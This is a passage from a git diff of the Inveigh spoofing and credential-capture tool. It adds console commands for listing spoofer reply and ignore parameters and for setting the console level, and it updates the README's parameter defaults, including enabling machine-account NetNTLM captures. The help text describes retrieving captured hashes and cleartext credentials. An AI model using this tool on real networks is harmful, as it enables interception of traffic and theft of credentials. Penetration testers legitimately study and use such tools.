"GET IGNOREDOMAINS": + foreach (string entry in Program.argIgnoreDomains) + Console.WriteLine(entry); + break; + + case "GET REPLYTOMACS": + foreach (string entry in Program.argReplyToMACs) + Console.WriteLine(entry); + break; + + case "GET IGNOREMACS": + foreach (string entry in Program.argIgnoreMACs) + Console.WriteLine(entry); + break; + + case "SET CONSOLE": + SetConsole(value); + break; + case "?": case "HELP": GetHelp(); @@ -516,7 +544,16 @@ namespace Inveigh commands.Add("GET NTLMV2USERNAMES,get usernames and source IPs/hostnames for captured NTLMv2 hashes"); commands.Add("GET CLEARTEXT,get captured cleartext credentials"); commands.Add("GET CLEARTEXTUNIQUE,get unique captured cleartext credentials"); - commands.Add("HISTORY,get console command history"); + commands.Add("GET REPLYTODOMAINS,get ReplyToDomains parameter startup values"); + commands.Add("GET REPLYTOHOSTS,get ReplyToHosts parameter startup values"); + commands.Add("GET REPLYTOIPS,get ReplyToIPs parameter startup values"); + commands.Add("GET REPLYTOMACS,get ReplyToMACs parameter startup values"); + commands.Add("GET IGNOREDOMAINS,get IgnoreDomains parameter startup values"); + commands.Add("GET IGNOREHOSTS,get IgnoreHosts parameter startup values"); + commands.Add("GET IGNOREIPS,get IgnoreIPs parameter startup values"); + commands.Add("GET IGNOREMACS,get IgnoreMACs parameter startup values"); + commands.Add("SET CONSOLE,set Console parameter value"); + commands.Add("HISTORY,get command history"); commands.Add("RESUME,resume real time console output"); commands.Add("STOP,stop Inveigh"); Output.OutputCommand(description, headings, commands, Program.colorPositive); @@ -620,6 +657,22 @@ namespace Inveigh Output.OutputCommand(description, headers, list, Program.colorPositive); } + public static void GetLog(string search) + { + IList list = Program.logList; + + if (!string.IsNullOrEmpty(search)) + { + list = GetResults(search, list); + } + + foreach (string entry in list) + { + Output.ConsoleOutputFormat(entry); + } + + } + public static void GetNTLMv1(string search) { string description = "NTLMv1 Hashes"; @@ -711,39 +764,41 @@ namespace Inveigh Output.OutputCommand(description, headers, list, Program.colorPositive); } - public static void GetSpooferReplyLists() + public static void SetConsole(string value) { - if (Program.ntlmv2UsernameList.Count > 0) + if (!string.IsNullOrEmpty(value)) { - Console.WriteLine(string.Format("[+] [{0}] Current NTLMv2 IP addresses, hostnames, and usernames:", Output.Timestamp())); - string[] outputNTLMV2Usernames = Program.ntlmv2UsernameList.ToArray(); - foreach (string entry in outputNTLMV2Usernames) - Console.WriteLine(entry); - } - else - { - Console.WriteLine(string.Format("[+] [{0}] NTLMv2 IP address, hostname, and username list is empty", Output.Timestamp())); - } - } + try + { + Int32.Parse(value); + int console = Int32.Parse(value); - public static void GetSpooferIgnoreLists() - { + if (console <= 5) + { + Program.console = console; + Output.OutputCommand("Console value set to " + value); + } + else + { + Output.OutputCommand("Value must be between 0 and 5"); + } + + } + catch + { + Output.OutputCommand("Value must be an integer"); + } - if (Program.ntlmv2UsernameList.Count > 0) - { - Console.WriteLine(string.Format("Current NTLMv2 IP addresses, hostnames, and usernames:", Output.Timestamp())); - string[] outputNTLMV2Usernames = Program.ntlmv2UsernameList.ToArray(); - foreach (string entry in outputNTLMV2Usernames) - Console.WriteLine(entry); } else { - Console.WriteLine(string.Format("[+] [{0}] NTLMv2 IP address, hostname, and username list is empty", Output.Timestamp())); + Output.OutputCommand("No value specified"); } } } + } diff --git a/README.md b/README.md index f914ff0..6046448 100644 --- a/README.md +++ b/README.md @@ -69,7 +69,7 @@ Default parameter values are located at the beginning of Program.cs. I recommend public static string argCert = "MIIKaQIBAzCCC..." public static string argCertPassword = "password"; public static string argChallenge = ""; - public static string argConsole = "3"; + public static string argConsole = "5"; public static string argConsoleLimit = "-1"; public static string argConsoleStatus = "0"; public static string argConsoleUnique = "Y"; @@ -100,7 +100,7 @@ Control: Output: - -Console Default=3: Set the level for console output. (0=none, 1=only captures/spoofs, 2=no informational, 3=all) + -Console Default=5: Set the level for console output. (0=none, 1=only captures/spoofs, 2=no disabled, no informational, 3=no disabled, no filtered, 4=no disabled, 5=all) -ConsoleLimit Default=Unlimited: Limit to queued console entries. @@ -140,6 +140,8 @@ Spoofers: -ICMPv6 Default=Enabled: (Y/N) sending ICMPv6 router advertisements. -ICMPv6Interval Default=200: ICMPv6 RA interval in seconds. + + -ICMPv6TTL Default=300: ICMPv6 TTL in seconds. -IgnoreDomains Default=None: Comma separated list of domains to ignore when spoofing. @@ -220,7 +222,7 @@ Capture: -ListenerIPv6 Default=Any: IPv6 address for all listeners. - -Machines Default=Disabled: (Y/N) machine account NetNTLM captures. + -MachineAccount Default=Enabled: (Y/N) machine account NetNTLM captures. -Proxy Default=Disabled: (Y/N) proxy listener authentication captures. @@ -489,7 +491,16 @@ GET NTLMV1USERNAMES | get usernames and source IPs/hostnames for cap GET NTLMV2USERNAMES | get usernames and source IPs/hostnames for captured NTLMv2 hashes GET CLEARTEXT | get captured cleartext credentials GET CLEARTEXTUNIQUE | get unique captured cleartext credentials -HISTORY | get console command history +GET REPLYTODOMAINS | get ReplyToDomains parameter startup values +GET REPLYTOHOSTS | get ReplyToHosts parameter startup values +GET REPLYTOIPS | get ReplyToIPs parameter startup values +GET REPLYTOMACS | get ReplyToMACs parameter startup values +GET IGNOREDOMAINS | get IgnoreDomains parameter startup values +GET IGNOREHOSTS | get IgnoreHosts parameter startup values +GET IGNOREIPS | get IgnoreIPs parameter startup values +GET IGNOREMACS | get IgnoreMACs parameter startup values +SET CONSOLE | set Console parameter value +HISTORY | get command history RESUME | resume real time console output STOP | stop Inveigh ``` -- cgit v1.2.3